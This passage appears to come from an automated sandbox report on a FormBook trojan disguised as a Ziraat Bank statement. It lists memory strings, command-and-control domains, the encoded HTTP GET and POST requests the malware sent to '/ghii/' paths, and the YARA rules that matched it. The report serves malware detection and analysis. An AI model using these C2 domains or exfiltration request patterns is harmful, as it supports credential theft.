          Source: explorer.exe, 00000003.00000003.533260759.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.543156085.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.542800350.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.568191855.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.536379987.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.genuineinsights.cloud
          Source: explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.genuineinsights.cloud/ghii/
          Source: explorer.exe, 00000003.00000003.533260759.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.543156085.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.542800350.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.568191855.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.536379987.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hubyazilim.com
          Source: explorer.exe, 00000003.00000003.533260759.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.543156085.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.542800350.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.568191855.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.536379987.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hubyazilim.com/ghii/
          Source: explorer.exe, 00000003.00000003.533260759.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.543156085.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.542800350.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.568191855.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.536379987.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ixirwholesale.xyz
          Source: explorer.exe, 00000003.00000003.533260759.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.543156085.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.542800350.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.568191855.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.536379987.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ixirwholesale.xyz/ghii/
          Source: explorer.exe, 00000003.00000003.533260759.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.543156085.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.542800350.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.568191855.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.536379987.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.563778060.00000000079B1000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ladybillplanet.com
          Source: explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ladybillplanet.com/ghii/
          Source: explorer.exe, 00000003.00000003.533260759.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.543156085.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.542800350.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.568191855.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.536379987.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nortonseecurity.com
          Source: explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nortonseecurity.com/ghii/
          Source: explorer.exe, 00000003.00000003.533260759.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.543156085.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.542800350.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.568191855.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.536379987.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.octohoki.net
          Source: explorer.exe, 00000003.00000003.533260759.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.543156085.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.542800350.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.568191855.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.536379987.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.octohoki.net/ghii/
          Source: explorer.exe, 00000003.00000002.568191855.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.octohoki.netP7
          Source: explorer.exe, 00000003.00000002.570167249.0000000015A5C000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000004.00000002.558739823.00000000056BC000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.searchvity.com/
          Source: explorer.exe, 00000003.00000002.570167249.0000000015A5C000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000004.00000002.558739823.00000000056BC000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.searchvity.com/?dn=
          Source: explorer.exe, 00000003.00000003.533260759.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.543156085.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.542800350.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.568191855.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.536379987.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sem-jobs.com
          Source: explorer.exe, 00000003.00000003.533260759.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.543156085.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.542800350.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.568191855.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.536379987.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sem-jobs.com/ghii/
          Source: explorer.exe, 00000003.00000003.533260759.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.543156085.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.542800350.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.568191855.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.536379987.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wenzid4.top
          Source: explorer.exe, 00000003.00000003.533260759.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.543156085.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.542800350.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.568191855.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.536379987.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wenzid4.top/ghii/
          Source: explorer.exe, 00000003.00000003.533260759.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.543156085.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.542800350.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.568191855.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.536379987.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wenzid4.top4
          Source: explorer.exe, 00000003.00000003.533260759.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.543156085.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.542800350.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.568191855.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.536379987.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yeah-go.com
          Source: explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yeah-go.com/ghii/
          Source: -912K03JO.4.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: -912K03JO.4.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: -912K03JO.4.drString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: cmmon32.exe, 00000004.00000003.371886260.0000000000A38000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.4.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: -912K03JO.4.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: explorer.exe, 00000003.00000002.570167249.00000000158CA000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000004.00000002.558739823.000000000552A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Montserrat:200
          Source: cmmon32.exe, 00000004.00000003.371886260.0000000000A38000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.4.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
          Source: cmmon32.exe, 00000004.00000003.371886260.0000000000A38000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.4.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
          Source: cmmon32.exe, 00000004.00000003.371886260.0000000000A38000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.4.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
          Source: cmmon32.exe, 00000004.00000003.371886260.0000000000A38000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.4.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
          Source: cmmon32.exe, 00000004.00000003.371886260.0000000000A38000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.4.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: unknownHTTP traffic detected: POST /ghii/ HTTP/1.1Host: www.energybig.xyzConnection: closeContent-Length: 185Cache-Control: no-cacheOrigin: http://www.energybig.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.energybig.xyz/ghii/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 75 79 72 3d 4b 75 47 55 64 7a 32 39 51 61 76 34 54 6a 52 59 70 51 55 4d 57 62 6d 6d 78 61 4d 6b 79 5f 39 55 4e 6c 47 4b 61 56 4c 4b 45 49 63 36 6f 61 33 38 41 59 4f 7a 63 75 63 4f 67 76 50 7a 63 6a 32 59 63 59 75 70 38 5f 51 4d 71 55 61 38 69 69 71 32 38 63 37 5a 75 59 45 6c 68 79 38 6f 30 4f 39 71 50 67 4b 52 43 6c 57 50 30 65 39 31 6f 2d 6a 4c 48 4f 6c 4d 6d 79 41 46 70 56 46 6b 35 37 6b 5f 63 56 30 79 57 41 48 53 4d 39 63 35 69 59 46 42 54 43 61 63 43 4a 41 71 76 56 47 2d 57 30 44 34 28 69 52 73 42 59 28 32 49 36 46 4f 44 76 36 55 55 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: uyr=KuGUdz29Qav4TjRYpQUMWbmmxaMky_9UNlGKaVLKEIc6oa38AYOzcucOgvPzcj2YcYup8_QMqUa8iiq28c7ZuYElhy8o0O9qPgKRClWP0e91o-jLHOlMmyAFpVFk57k_cV0yWAHSM9c5iYFBTCacCJAqvVG-W0D4(iRsBY(2I6FODv6UUA).
          Source: unknownDNS traffic detected: queries for: www.wenzid4.top
          Source: global trafficHTTP traffic detected: GET /ghii/?IlOzNN=EyIBgfI12Z&uyr=MOY5/0rZkCSn1x8B5kGxcu4kjN12BC26NMBU4rUAiJ09dU/WDm+Fx0Du9tK3DtQGeLOXEwxSHBLi0tUrRAF3LCH1xNv1NtM5EA== HTTP/1.1Host: www.wenzid4.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ghii/?IlOzNN=EyIBgfI12Z&uyr=Hsu0eFbPaPXvQj1driY9Qb+UxIEGydZDMi24Zx/KBNJzrILAD6eOCtsvvO79CgG5LYmF38wKy0LUujLv+r7gh4V4lR0M0OxnEw== HTTP/1.1Host: www.energybig.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ghii/?uyr=b9pmEiWE3A9hICRLJ48/0GIWTdcguNEQkRUuEoMGZR2jfpcIS7+82C+h9uoa2hbDMoucG0FStkg6AqIGzw0gyz2/IGepHjywiw==&IlOzNN=EyIBgfI12Z HTTP/1.1Host: www.genuineinsights.cloudConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ghii/?IlOzNN=EyIBgfI12Z&uyr=mbPzPtZ0Er8L5pad82wwGh9ocqcT3a4VC5lEcjpUbblZCC9rEfNiJ4Zzn4lMJLJJ2TaA1od8FsE8LCEUSFIoVIj1yavarUZuxw== HTTP/1.1Host: www.octohoki.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ghii/?uyr=nNwsU5RDSztrDyxRHILLs79A8ojzBVjbvYOj2DqB/Q3esj8ZmeFlGSz1p8lC+bcuH8jypYjqHnnMah8No3XkProQXaSL0hAuoA==&IlOzNN=EyIBgfI12Z HTTP/1.1Host: www.ladybillplanet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: tqxwmam.exe, 00000001.00000002.302906289.000000000065A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405809

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.tqxwmam.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.tqxwmam.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.331233297.00000000005B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.331080035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.556915588.0000000000900000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.557710413.0000000003280000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.557515887.0000000002F80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.331329417.00000000005E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 2.2.tqxwmam.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.tqxwmam.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.tqxwmam.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.tqxwmam.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.331233297.00000000005B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.331233297.00000000005B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.331080035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.331080035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.556915588.0000000000900000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.556915588.0000000000900000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.557710413.0000000003280000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.557710413.0000000003280000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.557515887.0000000002F80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.557515887.0000000002F80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.331329417.00000000005E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.331329417.00000000005E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: 2.2.tqxwmam.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.tqxwmam.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.tqxwmam.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.tqxwmam.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.331233297.00000000005B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.331233297.00000000005B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.331080035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.331080035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.556915588.0000000000900000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.556915588.0000000000900000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.557710413.0000000003280000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.557710413.0000000003280000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.557515887.0000000002F80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.557515887.0000000002F80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.331329417.00000000005E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
